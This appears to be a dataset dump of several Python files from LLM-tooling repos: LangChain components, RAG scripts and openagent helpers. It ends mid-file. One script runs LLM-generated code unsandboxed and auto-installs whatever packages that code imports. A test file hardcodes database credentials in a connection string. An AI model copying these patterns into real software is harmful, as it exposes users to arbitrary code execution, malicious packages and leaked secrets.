def _toxicity_init_validate(self, max_size: int) -> Any:
"""
Validate and initialize toxicity processing configuration.
Args:
max_size (int): Maximum sentence size defined in the
configuration object.
Raises:
Exception: If the maximum sentence size exceeds the 5KB limit.
Note:
This function ensures that the NLTK punkt tokenizer is downloaded
if not already present.
Returns:
None
"""
if max_size > 1024 * 5:
raise Exception("The sentence length should not exceed 5KB.")
try:
nltk = importlib.import_module("nltk")
nltk.data.find("tokenizers/punkt")
return nltk
except ImportError:
raise ModuleNotFoundError(
"Could not import nltk python package. "
"Please install it with `pip install nltk`."
)
except LookupError:
nltk.download("punkt")
def _split_paragraph(
self, prompt_value: str, max_size: int = 1024 * 4
) -> List[List[str]]:
"""
Split a paragraph into chunks of sentences, respecting the maximum size limit.
Args:
paragraph (str): The input paragraph to be split into chunks.
max_size (int, optional): The maximum size limit in bytes for
each chunk. Defaults to 1024.
Returns:
List[List[str]]: A list of chunks, where each chunk is a list
of sentences.
Note:
This function validates the maximum sentence size based on service
limits using the 'toxicity_init_validate' function. It uses the NLTK
sentence tokenizer to split the paragraph into sentences.
Example:
paragraph = "This is a sample paragraph. It
contains multiple sentences. ..."
chunks = split_paragraph(paragraph, max_size=2048)
"""
# validate max. sentence size based on Service limits
nltk = self._toxicity_init_validate(max_size)
sentences = nltk.sent_tokenize(prompt_value)
chunks = list() # type: ignore
current_chunk = list() # type: ignore
current_size = 0
for sentence in sentences:
sentence_size = len(sentence.encode("utf-8"))
# If adding a new sentence exceeds max_size
# or current_chunk has 10 sentences, start a new chunk
if (current_size + sentence_size > max_size) or (len(current_chunk) >= 10):
if current_chunk: # Avoid appending empty chunks
chunks.append(current_chunk)
current_chunk = []
current_size = 0
current_chunk.append(sentence)
current_size += sentence_size
# Add any remaining sentences
if current_chunk:
chunks.append(current_chunk)
return chunks
def validate(self, prompt_value: str, config: Any = None) -> str:
"""
Check the toxicity of a given text prompt using AWS
Comprehend service and apply actions based on configuration.
Args:
prompt_value (str): The text content to be checked for toxicity.
config (Dict[str, Any]): Configuration for toxicity checks and actions.
Returns:
str: The original prompt_value if allowed or no toxicity found.
Raises:
ValueError: If the prompt contains toxic labels and cannot be
processed based on the configuration.
"""
chunks = self._split_paragraph(prompt_value=prompt_value)
for sentence_list in chunks:
segments = [{"Text": sentence} for sentence in sentence_list]
response = self.client.detect_toxic_content(
TextSegments=segments, LanguageCode="en"
)
if self.callback and self.callback.toxicity_callback:
self.moderation_beacon["moderation_input"] = segments # type: ignore
self.moderation_beacon["moderation_output"] = response
toxicity_found = False
threshold = config.get("threshold")
toxicity_labels = config.get("labels")
if not toxicity_labels:
for item in response["ResultList"]:
for label in item["Labels"]:
if label["Score"] >= threshold:
toxicity_found = True
break
else:
for item in response["ResultList"]:
for label in item["Labels"]:
if (
label["Name"] in toxicity_labels
and label["Score"] >= threshold
):
toxicity_found = True
break
if self.callback and self.callback.toxicity_callback:
if toxicity_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_toxicity(
self.moderation_beacon, self.unique_id
)
)
if toxicity_found:
raise ModerationToxicityError
return prompt_value
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~memory~readonly.py | from typing import Any, Dict, List
from langchain.schema import BaseMemory
class ReadOnlySharedMemory(BaseMemory):
"""A memory wrapper that is read-only and cannot be changed."""
memory: BaseMemory
@property
def memory_variables(self) -> List[str]:
"""Return memory variables."""
return self.memory.memory_variables
def load_memory_variables(self, inputs: Dict[str, Any]) -> Dict[str, str]:
"""Load memory variables from memory."""
return self.memory.load_memory_variables(inputs)
def save_context(self, inputs: Dict[str, Any], outputs: Dict[str, str]) -> None:
"""Nothing should be saved or changed"""
pass
def clear(self) -> None:
"""Nothing to clear, got a memory like a vault."""
pass
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~llms~huggingface_endpoint.py | from typing import Any, Dict, List, Mapping, Optional
import requests
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, root_validator
from langchain.utils import get_from_dict_or_env
VALID_TASKS = ("text2text-generation", "text-generation", "summarization")
class HuggingFaceEndpoint(LLM):
"""HuggingFace Endpoint models.
To use, you should have the ``huggingface_hub`` python package installed, and the
environment variable ``HUGGINGFACEHUB_API_TOKEN`` set with your API token, or pass
it as a named parameter to the constructor.
Only supports `text-generation` and `text2text-generation` for now.
Example:
.. code-block:: python
from langchain.llms import HuggingFaceEndpoint
endpoint_url = (
"https://abcdefghijklmnop.us-east-1.aws.endpoints.huggingface.cloud"
)
hf = HuggingFaceEndpoint(
endpoint_url=endpoint_url,
huggingfacehub_api_token="my-api-key"
)
"""
endpoint_url: str = ""
"""Endpoint URL to use."""
task: Optional[str] = None
"""Task to call the model with.
Should be a task that returns `generated_text` or `summary_text`."""
model_kwargs: Optional[dict] = None
"""Keyword arguments to pass to the model."""
huggingfacehub_api_token: Optional[str] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
huggingfacehub_api_token = get_from_dict_or_env(
values, "huggingfacehub_api_token", "HUGGINGFACEHUB_API_TOKEN"
)
try:
from huggingface_hub.hf_api import HfApi
try:
HfApi(
endpoint="https://huggingface.co", # Can be a Private Hub endpoint.
token=huggingfacehub_api_token,
).whoami()
except Exception as e:
raise ValueError(
"Could not authenticate with huggingface_hub. "
"Please check your API token."
) from e
except ImportError:
raise ValueError(
"Could not import huggingface_hub python package. "
"Please install it with `pip install huggingface_hub`."
)
values["huggingfacehub_api_token"] = huggingfacehub_api_token
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
_model_kwargs = self.model_kwargs or {}
return {
**{"endpoint_url": self.endpoint_url, "task": self.task},
**{"model_kwargs": _model_kwargs},
}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "huggingface_endpoint"
def _call(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
"""Call out to HuggingFace Hub's inference endpoint.
Args:
prompt: The prompt to pass into the model.
stop: Optional list of stop words to use when generating.
Returns:
The string generated by the model.
Example:
.. code-block:: python
response = hf("Tell me a joke.")
"""
_model_kwargs = self.model_kwargs or {}
# payload samples
params = {**_model_kwargs, **kwargs}
parameter_payload = {"inputs": prompt, "parameters": params}
# HTTP headers for authorization
headers = {
"Authorization": f"Bearer {self.huggingfacehub_api_token}",
"Content-Type": "application/json",
}
# send request
try:
response = requests.post(
self.endpoint_url, headers=headers, json=parameter_payload
)
except requests.exceptions.RequestException as e: # This is the correct syntax
raise ValueError(f"Error raised by inference endpoint: {e}")
generated_text = response.json()
if "error" in generated_text:
raise ValueError(
f"Error raised by inference API: {generated_text['error']}"
)
if self.task == "text-generation":
text = generated_text[0]["generated_text"]
# Remove prompt if included in generated text.
if text.startswith(prompt):
text = text[len(prompt) :]
elif self.task == "text2text-generation":
text = generated_text[0]["generated_text"]
elif self.task == "summarization":
text = generated_text[0]["summary_text"]
else:
raise ValueError(
f"Got invalid task {self.task}, "
f"currently only {VALID_TASKS} are supported"
)
if stop is not None:
# This is a bit hacky, but I can't figure out a better way to enforce
# stop tokens when making calls to huggingface_hub.
text = enforce_stop_tokens(text, stop)
return text
| [] |
2024-01-10 | goML-offers/data_explanation | api~services~chat_bot.py | from pandas import DataFrame
import requests
from pandasai import PandasAI
from pandasai.llm.openai import OpenAI
import pandas as pd
import os
from dotenv import load_dotenv
# Load environment variables from .env file
load_dotenv()
OPEN_API_KEY = os.getenv('OPEN_API_KEY')
def analyze_dataframe(df: pd.DataFrame, question: str) -> str:
# Round floating-point columns to a reasonable number of decimal places (e.g., 6)
df = df.round(6)
# Convert all DataFrame columns to strings
df = df.astype(str)
# Create an instance of the OpenAI API
llm = OpenAI(api_token=os.getenv('OPEN_API_KEY'))
# Create an instance of PandasAI
pandas_ai = PandasAI (llm, conversational=False)
# Ask a question about the DataFrame
response = pandas_ai(df, question+",strictly only give me answers in text form with precise stat values; type the precise response first, followed by an explanation that is clear to a layperson. The response must contain at least 50 words.")
return response | [] |
2024-01-10 | Tuminha/QueryPDF | improvedquery.py | import os
import argparse
from dotenv import load_dotenv
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
# Parse command-line arguments
parser = argparse.ArgumentParser(description="Run a query on the Vector Store.")
parser.add_argument("query", help="The query to run.")
args = parser.parse_args()
# Load environmental variables
load_dotenv()
# Set OpenAI and ActiveLoop API keys
os.environ['OPENAI_API_KEY'] = os.getenv('OPENAI_API_KEY')
os.environ['ACTIVELOOP_TOKEN'] = os.getenv('ACTIVELOOP_TOKEN')
# Specify the model to use
EMBEDDING_MODEL = os.getenv('EMBEDDINGS_MODEL')
ACTIVELOOP_DATASET_PATH = os.getenv('DATASET_PATH')
QA_PROMPT = "As a digital assistant with access to a vast database of dental knowledge, I'm asked: {question}"
CONDENSE_PROMPT = "I have found a variety of resources. Can you summarize the key points about: {documents}"
# Initialize OpenAI embeddings
embeddings = OpenAIEmbeddings(model=EMBEDDING_MODEL, disallowed_special=())
# Load DeepLake Vector Store
db = DeepLake(dataset_path=ACTIVELOOP_DATASET_PATH, read_only=True, embedding_function=embeddings)
# Create retriever object and specify search parameters
retriever = db.as_retriever()
retriever.search_kwargs['distance_metric'] = 'cos'
retriever.search_kwargs['k'] = 3
# Create a LangChain model for QA
model = ChatOpenAI(
model='gpt-3.5-turbo',
temperature=0.4,
max_tokens=2500
)
qa = RetrievalQA.from_llm(
model,
retriever=retriever,
qa_template=QA_PROMPT,
question_generator_template=CONDENSE_PROMPT,
return_source_documents=True
)
# Perform a query
response = qa.run(args.query)
print(response)
| [
"As a digital assistant with access to a vast database of dental knowledge, I'm asked: {question}",
"I have found a variety of resources. Can you summarize the key points about: {documents}"
] |
2024-01-10 | Tuminha/QueryPDF | pdfload.py | import os
import glob
from dotenv import load_dotenv
from langchain.document_loaders import PyPDFLoader
from langchain.vectorstores import DeepLake
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
# Load variables from .env file
load_dotenv()
# Set the ACTIVELOOP_TOKEN, OPENAI_API_KEY, EMBEDDINGS_MODEL, and DATASET_PATH environment variables
ACTIVELOOP_TOKEN = os.getenv('ACTIVELOOP_TOKEN')
EMBEDDINGS_MODEL = os.getenv('EMBEDDINGS_MODEL')
DATASET_PATH = os.getenv('DATASET_PATH')
OPENAI_API_KEY=os.getenv('OPENAI_API_KEY')
os.environ['ACTIVELOOP_TOKEN'] = ACTIVELOOP_TOKEN
os.environ['OPENAI_API_KEY'] = OPENAI_API_KEY
# Create the DeepLake Vector Store
embeddings = OpenAIEmbeddings(model=EMBEDDINGS_MODEL)
# Iterate over all PDF files in the specified directory
pdf_directory = 'docs'
pdf_files = glob.glob(pdf_directory + '/*.pdf')
for pdf_file in pdf_files:
# Load and split each PDF file
loader = PyPDFLoader(pdf_file)
pages = loader.load_and_split()
# Add the documents to the Vector Store
deeplake_db = DeepLake.from_documents(pages, embeddings, dataset_path=DATASET_PATH)
# Create a retriever
retriever = deeplake_db.as_retriever()
retriever.search_kwargs['distance_metric'] = 'cos'
retriever.search_kwargs['k'] = 2
# Create a RetrievalQA chain and run it
model = ChatOpenAI(model='gpt-3.5-turbo')
qa = RetrievalQA.from_llm(model, retriever=retriever)
# Run the question
response = qa.run('What is the platform switching?')
print(response)
| [] |
2024-01-10 | priyanshics20/test | playground~test_factcheck.py | import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
from openagent.llms._openai import OpenAI
from openagent.fact_check.factool import Factool
from dotenv import load_dotenv
load_dotenv()
# Initialize a Factool instance with the specified keys. foundation_model could be either "gpt-3.5-turbo" or "gpt-4"
factool_instance = Factool("gpt-4")
inputs = [
{
"prompt": "Introduce Graham Neubig",
"response": "Graham Neubig is a professor at MIT",
"category": "kbqa"
},
]
response_list = factool_instance.run(inputs)
print(response_list) | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~bibtex.py | #Directly taken from Langchain Github Repo
"""Util that calls bibtexparser."""
import logging
from typing import Any, Dict, List, Mapping
from pydantic import BaseModel, Extra, root_validator
logger = logging.getLogger(__name__)
OPTIONAL_FIELDS = [
"annotate",
"booktitle",
"editor",
"howpublished",
"journal",
"keywords",
"note",
"organization",
"publisher",
"school",
"series",
"type",
"doi",
"issn",
"isbn",
]
class BibtexparserWrapper(BaseModel):
"""Wrapper around bibtexparser.
To use, you should have the ``bibtexparser`` python package installed.
https://bibtexparser.readthedocs.io/en/master/
This wrapper will use bibtexparser to load a collection of references from
a bibtex file and fetch document summaries.
"""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in environment."""
try:
import bibtexparser # noqa
except ImportError:
raise ImportError(
"Could not import bibtexparser python package. "
"Please install it with `pip install bibtexparser`."
)
return values
def load_bibtex_entries(self, path: str) -> List[Dict[str, Any]]:
"""Load bibtex entries from the bibtex file at the given path."""
import bibtexparser
with open(path) as file:
entries = bibtexparser.load(file).entries
return entries
def get_metadata(
self, entry: Mapping[str, Any], load_extra: bool = False
) -> Dict[str, Any]:
"""Get metadata for the given entry."""
publication = entry.get("journal") or entry.get("booktitle")
if "url" in entry:
url = entry["url"]
elif "doi" in entry:
url = f'https://doi.org/{entry["doi"]}'
else:
url = None
meta = {
"id": entry.get("ID"),
"published_year": entry.get("year"),
"title": entry.get("title"),
"publication": publication,
"authors": entry.get("author"),
"abstract": entry.get("abstract"),
"url": url,
}
if load_extra:
for field in OPTIONAL_FIELDS:
meta[field] = entry.get(field)
return {k: v for k, v in meta.items() if v is not None} | [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~pinecone.py | """Wrapper around Pinecone vector database."""
from __future__ import annotations
import logging
import uuid
from typing import Any, Callable, Iterable, List, Optional, Tuple
from openagent.schema import Document
from openagent.vectorstores.embeddings.base import Embeddings
from openagent.vectorstores.base import VectorStore
logger = logging.getLogger(__name__)
class Pinecone(VectorStore):
"""Wrapper around Pinecone vector database.
To use, you should have the ``pinecone-client`` python package installed.
Example:
.. code-block:: python
from openagent.vectorstores import Pinecone
from openagent.embeddings.openai import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
index = pinecone.Index("openagent-demo")
embeddings = OpenAIEmbeddings()
vectorstore = Pinecone(index, embeddings.embed_query, "text")
"""
def __init__(
self,
index: Any,
embedding_function: Embeddings,
text_key: str,
namespace: Optional[str] = None,
):
"""Initialize with Pinecone client."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
if not isinstance(index, pinecone.index.Index):
raise ValueError(
f"client should be an instance of pinecone.index.Index, "
f"got {type(index)}"
)
self._index = index
self._embedding_function = embedding_function
self._text_key = text_key
self._namespace = namespace
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
namespace: Optional[str] = None,
batch_size: int = 32,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
ids: Optional list of ids to associate with the texts.
namespace: Optional pinecone namespace to add the texts to.
Returns:
List of ids from adding the texts into the vectorstore.
"""
if namespace is None:
namespace = self._namespace
# Embed and create the documents
docs = []
ids = ids or [str(uuid.uuid4()) for _ in texts]
for i, text in enumerate(texts):
embedding = self._embedding_function(text)
metadata = metadatas[i] if metadatas else {}
metadata[self._text_key] = text
docs.append((ids[i], embedding, metadata))
# upsert to Pinecone
self._index.upsert(vectors=docs, namespace=namespace, batch_size=batch_size)
return ids
def similarity_search(
self,
query: Optional[str],
embedding: Optional[list[float]],
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to query, along with scores.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
if (embedding is None and query is None) or (embedding is not None and query is not None):
raise ValueError("You must provide either query embeddings or query texts, but not both")
if namespace is None:
namespace = self._namespace
query_obj = self._embedding_function(query) if query is not None else embedding
docs = []
results = self._index.query(
[query_obj],
top_k=k,
include_metadata=True,
namespace=namespace,
filter=filter,
)
for res in results["matches"]:
metadata = res["metadata"]
if self._text_key in metadata:
text = metadata.pop(self._text_key)
score = res["score"]
docs.append((Document(page_content=text, metadata=metadata), score))
else:
logger.warning(
f"Found document with no `{self._text_key}` key. Skipping."
)
return docs
@classmethod
def from_texts(
cls,
texts: List[str],
embedding_function: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
batch_size: int = 32,
text_key: str = "text",
index_name: Optional[str] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> Pinecone:
"""Construct Pinecone wrapper from raw documents.
This is a user friendly interface that:
1. Embeds documents.
2. Adds the documents to a provided Pinecone index
This is intended to be a quick way to get started.
Example:
.. code-block:: python
from langchain import Pinecone
from langchain.embeddings import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
embeddings = OpenAIEmbeddings()
pinecone = Pinecone.from_texts(
texts,
embeddings,
index_name="langchain-demo"
)
"""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
indexes = pinecone.list_indexes() # checks if provided index exists
if index_name in indexes:
index = pinecone.Index(index_name)
elif len(indexes) == 0:
raise ValueError(
"No active indexes found in your Pinecone project, "
"are you sure you're using the right API key and environment?"
)
else:
raise ValueError(
f"Index '{index_name}' not found in your Pinecone project. "
f"Did you mean one of the following indexes: {', '.join(indexes)}"
)
for i in range(0, len(texts), batch_size):
# set end position of batch
i_end = min(i + batch_size, len(texts))
# get batch of texts and ids
lines_batch = texts[i:i_end]
# create ids if not provided
if ids:
ids_batch = ids[i:i_end]
else:
ids_batch = [str(uuid.uuid4()) for n in range(i, i_end)]
# create embeddings
embeds = embedding_function.embed_documents(lines_batch)
# prep metadata and upsert batch
if metadatas:
metadata = metadatas[i:i_end]
else:
metadata = [{} for _ in range(i, i_end)]
for j, line in enumerate(lines_batch):
metadata[j][text_key] = line
to_upsert = zip(ids_batch, embeds, metadata)
# upsert to Pinecone
index.upsert(vectors=list(to_upsert), namespace=namespace)
return cls(index, embedding_function.embed_query, text_key, namespace)
@classmethod
def from_existing_index(
cls,
index_name: str,
embedding: Embeddings,
text_key: str = "text",
namespace: Optional[str] = None,
) -> Pinecone:
"""Load pinecone vectorstore from index name."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
return cls(
pinecone.Index(index_name), embedding.embed_query, text_key, namespace
)
def delete(self, ids: List[str]) -> None:
"""Delete by vector IDs.
Args:
ids: List of ids to delete.
"""
# This is the maximum number of IDs that can be deleted
chunk_size = 1000
for i in range(0, len(ids), chunk_size):
chunk = ids[i : i + chunk_size]
self._index.delete(ids=chunk)
| [] |
2024-01-10 | priyanshics20/test | playground~agentbox.py | import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
import openagent
from openagent.llms._openai import OpenAI as guidance_llm
from openagent.agent.chat import ChatAgent
from dotenv import load_dotenv
load_dotenv()
from jupyter_client import KernelManager
from IPython import display
import subprocess
import ast
import argparse
import threading
def agent():
llm = guidance_llm(
model="gpt-3.5-turbo"
)
chat_template = '''
{{#user~}}
I want to translate the following English text into Python code:
QUERY: {{input}}
{{~/user}}
{{#assistant~}}
Sure, I can assist with that. If I need more information, I'll ask for clarification.
{{~/assistant}}
{{#user~}}
Yes, go ahead and write the complete code.
{{~/user}}
{{#assistant~}}
{{gen 'response' temperature=0 max_tokens=3900}}
{{~/assistant}}
{{#assistant~}}
If the context or the task is not clear, please provide additional information to clarify.
{{~/assistant}}'''
agent = ChatAgent(
llm=llm,
prompt_template=chat_template,
)
return agent
def install_dependencies(code):
try:
# Parse the code to extract import statements
parsed_ast = ast.parse(code)
imports = []
for node in ast.walk(parsed_ast):
if isinstance(node, ast.Import):
imports.extend([name.name for name in node.names])
elif isinstance(node, ast.ImportFrom):
module_name = node.module
if module_name is not None:
imports.append(module_name)
# Remove duplicate imports and filter out standard library modules
imports = list(set(imports))
# print("imports", imports)
resolved_imports = set()
for imp in imports:
if '.' in imp:
parent_module = imp.split('.')[0]
resolved_imports.add(parent_module)
else:
resolved_imports.add(imp)
# Remove duplicate imports and filter out standard library modules
resolved_imports = list(resolved_imports)
# print("resolved_imports", resolved_imports)
third_party_dependencies = [dep for dep in resolved_imports if dep not in sys.modules]
# print("third_party_dependencies", third_party_dependencies)
if third_party_dependencies:
subprocess.check_call([sys.executable, "-m", "pip", "install"] + third_party_dependencies)
return True
else:
# print("No third-party dependencies detected.")
return True
except subprocess.CalledProcessError:
print("Dependency installation failed.")
return False
def run_python_code_in_kernel(code):
# Create a kernel manager
km = KernelManager(kernel_name='python3') # Use the appropriate kernel name
# Start the kernel
km.start_kernel()
# Connect to the kernel
kc = km.client()
kc.start_channels()
# Execute the code in the kernel
kc.execute(code)
# Create a thread for waiting on messages
def wait_for_messages():
try:
while True:
msg = kc.get_iopub_msg()
msg_type = msg['header']['msg_type']
if msg_type == 'display_data':
output_data = msg['content']['data']
if 'image/png' in output_data:
display.display_png(output_data['image/png'], raw=True)
elif 'image/jpeg' in output_data:
display.display_jpeg(output_data['image/png'], raw=True)
elif msg_type == 'stream':
output_data = msg['content']['text']
output_data = output_data.split("\n")
for output in output_data[:-1]:
display.display(output)
except asyncio.CancelledError:
pass # Ignore the exception
# Start the message-waiting thread
message_thread = threading.Thread(target=wait_for_messages)
message_thread.start()
# Wait for the specified timeout
timeout_seconds = 10
message_thread.join(timeout_seconds)
# Check if the thread is still alive (indicating timeout)
if message_thread.is_alive():
print("Code execution completed")
else:
print("Code execution completed within the timeout.")
# Stop the kernel
kc.stop_channels()
km.shutdown_kernel()
# Main function
def main(gpt_prompt):
res = agent().run(input=gpt_prompt)
code = f"""{res.split('```')[1].replace('python', '')}"""
print(code)
# Install dependencies
if install_dependencies(code):
# Run the generated code in the Jupyter kernel
run_python_code_in_kernel(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Execute Python code from the command line.')
parser.add_argument("--gpt_prompt", help="Python code to be executed", default=None)
args = parser.parse_args()
gpt_prompt = args.gpt_prompt
main(gpt_prompt)
| [
"\n {{#user~}}\n I want to translate the following English text into Python code:\n QUERY: {{input}}\n {{~/user}}\n\n {{#assistant~}}\n Sure, I can assist with that. If I need more information, I'll ask for clarification.\n {{~/assistant}}\n\n {{#user~}}\n Yes, go ahead and write the complete code.\n {{~/user}}\n\n {{#assistant~}}\n {{gen 'response' temperature=0 max_tokens=3900}}\n {{~/assistant}}\n\n {{#assistant~}}\n If the context or the task is not clear, please provide additional information to clarify.\n {{~/assistant}}"
] |
2024-01-10 | priyanshics20/test | playground~test_database_sql.py | import sys
import os
script_dir = os.path.dirname(os.path.abspath(__file__))
openagent_dir = os.path.abspath(os.path.join(script_dir, ".."))
sys.path.append(openagent_dir)
from openagent.tools.toolkits.SQL import SQLDatabaseToolkit
from openagent.helpers.sql_database import SQLDatabase
from openagent.llms._openai import OpenAI
llm=OpenAI(
model_name = "gpt-3.5-turbo",
openai_api_key=""
)
#Connect to database using connection string
db = SQLDatabase.from_uri("postgresql://zdacfiltaeqgfboocygtccgo%40psql-mock-database-cloud:mgsnfujnrvpcbvunovxzizhk@psql-mock-database-cloud.postgres.database.azure.com:5432/ecom1690210583529ypqrqrnjpngzufrw")
toolkit = SQLDatabaseToolkit(db=db, llm=llm)
tools = toolkit.get_tools()
print(tools[0]._run("select * from customers")) #QUERYSQLDataBase tool
print("----------------------------------------------------------------------------------------------------------------------------------")
print(tools[1]._run("customers, employees, offices")) #INFOSQLDataBase tool
print("----------------------------------------------------------------------------------------------------------------------------------")
print(tools[2]._run()) #LISTSQLDataBase tool
| [] |
2024-01-10 | priyanshics20/test | openagent~helpers~googlesearch.py | #COde directly taken from LangChain Github Repo
"""Util that calls Google Search."""
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class GoogleSearchAPIWrapper(BaseModel):
"""Wrapper for Google Search API.
Adapted from: Instructions adapted from https://stackoverflow.com/questions/
37083058/
programmatically-searching-google-in-python-using-custom-search
TODO: DOCS for using it
1. Install google-api-python-client
- If you don't already have a Google account, sign up.
- If you have never created a Google APIs Console project,
read the Managing Projects page and create a project in the Google API Console.
- Install the library using pip install google-api-python-client
The current version of the library is 2.70.0 at this time
2. To create an API key:
- Navigate to the APIs & Services→Credentials panel in Cloud Console.
- Select Create credentials, then select API key from the drop-down menu.
- The API key created dialog box displays your newly created key.
- You now have an API_KEY
3. Setup Custom Search Engine so you can search the entire web
- Create a custom search engine in this link.
- In Sites to search, add any valid URL (i.e. www.stackoverflow.com).
- That’s all you have to fill up, the rest doesn’t matter.
In the left-side menu, click Edit search engine → {your search engine name}
→ Setup Set Search the entire web to ON. Remove the URL you added from
the list of Sites to search.
- Under Search engine ID you’ll find the search-engine-ID.
4. Enable the Custom Search API
- Navigate to the APIs & Services→Dashboard panel in Cloud Console.
- Click Enable APIs and Services.
- Search for Custom Search API and click on it.
- Click Enable.
URL for it: https://console.cloud.google.com/apis/library/customsearch.googleapis
.com
"""
search_engine: Any #: :meta private:
google_api_key: Optional[str] = None
google_cse_id: Optional[str] = None
k: int = 10
siterestrict: bool = False
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _google_search_results(self, search_term: str, **kwargs: Any) -> List[dict]:
cse = self.search_engine.cse()
if self.siterestrict:
cse = cse.siterestrict()
res = cse.list(q=search_term, cx=self.google_cse_id, **kwargs).execute()
return res.get("items", [])
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
google_api_key = get_from_dict_or_env(
values, "google_api_key", "GOOGLE_API_KEY"
)
values["google_api_key"] = google_api_key
google_cse_id = get_from_dict_or_env(values, "google_cse_id", "GOOGLE_CSE_ID")
values["google_cse_id"] = google_cse_id
try:
from googleapiclient.discovery import build
except ImportError:
raise ImportError(
"google-api-python-client is not installed. "
"Please install it with `pip install google-api-python-client`"
)
service = build("customsearch", "v1", developerKey=google_api_key)
values["search_engine"] = service
return values
def run(self, query: str) -> str:
"""Run query through GoogleSearch and parse result."""
snippets = []
results = self._google_search_results(query, num=self.k)
if len(results) == 0:
return "No good Google Search Result was found"
for result in results:
if "snippet" in result:
snippets.append(result["snippet"])
return " ".join(snippets)
def results(self, query: str, num_results: int) -> List[Dict]:
"""Run query through GoogleSearch and return metadata.
Args:
query: The query to search for.
num_results: The number of results to return.
Returns:
A list of dictionaries with the following keys:
snippet - The description of the result.
title - The title of the result.
link - The link to the result.
"""
metadata_results = []
results = self._google_search_results(query, num=num_results)
if len(results) == 0:
return [{"Result": "No good Google Search Result was found"}]
for result in results:
metadata_result = {
"title": result["title"],
"link": result["link"],
}
if "snippet" in result:
metadata_result["snippet"] = result["snippet"]
metadata_results.append(metadata_result)
return metadata_results | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~wikipedia.py | #Code taken from langchain Github Repo and removed load method as it involved Documents from langchain
"""Util that calls Wikipedia."""
import logging
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Extra, root_validator
logger = logging.getLogger(__name__)
WIKIPEDIA_MAX_QUERY_LENGTH = 300
class WikipediaAPIWrapper(BaseModel):
"""Wrapper around WikipediaAPI.
To use, you should have the ``wikipedia`` python package installed.
This wrapper will use the Wikipedia API to conduct searches and
fetch page summaries. By default, it will return the page summaries
of the top-k results.
It limits the Document content by doc_content_chars_max.
"""
wiki_client: Any #: :meta private:
top_k_results: int = 3
lang: str = "en"
load_all_available_meta: bool = False
doc_content_chars_max: int = 4000
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that the python package exists in environment."""
try:
import wikipedia
wikipedia.set_lang(values["lang"])
values["wiki_client"] = wikipedia
except ImportError:
raise ImportError(
"Could not import wikipedia python package. "
"Please install it with `pip install wikipedia`."
)
return values
def run(self, query: str) -> str:
"""Run Wikipedia search and get page summaries."""
page_titles = self.wiki_client.search(query[:WIKIPEDIA_MAX_QUERY_LENGTH])
summaries = []
for page_title in page_titles[: self.top_k_results]:
if wiki_page := self._fetch_page(page_title):
if summary := self._formatted_page_summary(page_title, wiki_page):
summaries.append(summary)
if not summaries:
return "No good Wikipedia Search Result was found"
return "\n\n".join(summaries)[: self.doc_content_chars_max]
@staticmethod
def _formatted_page_summary(page_title: str, wiki_page: Any) -> Optional[str]:
return f"Page: {page_title}\nSummary: {wiki_page.summary}"
def _fetch_page(self, page: str) -> Optional[str]:
try:
return self.wiki_client.page(title=page, auto_suggest=False)
except (
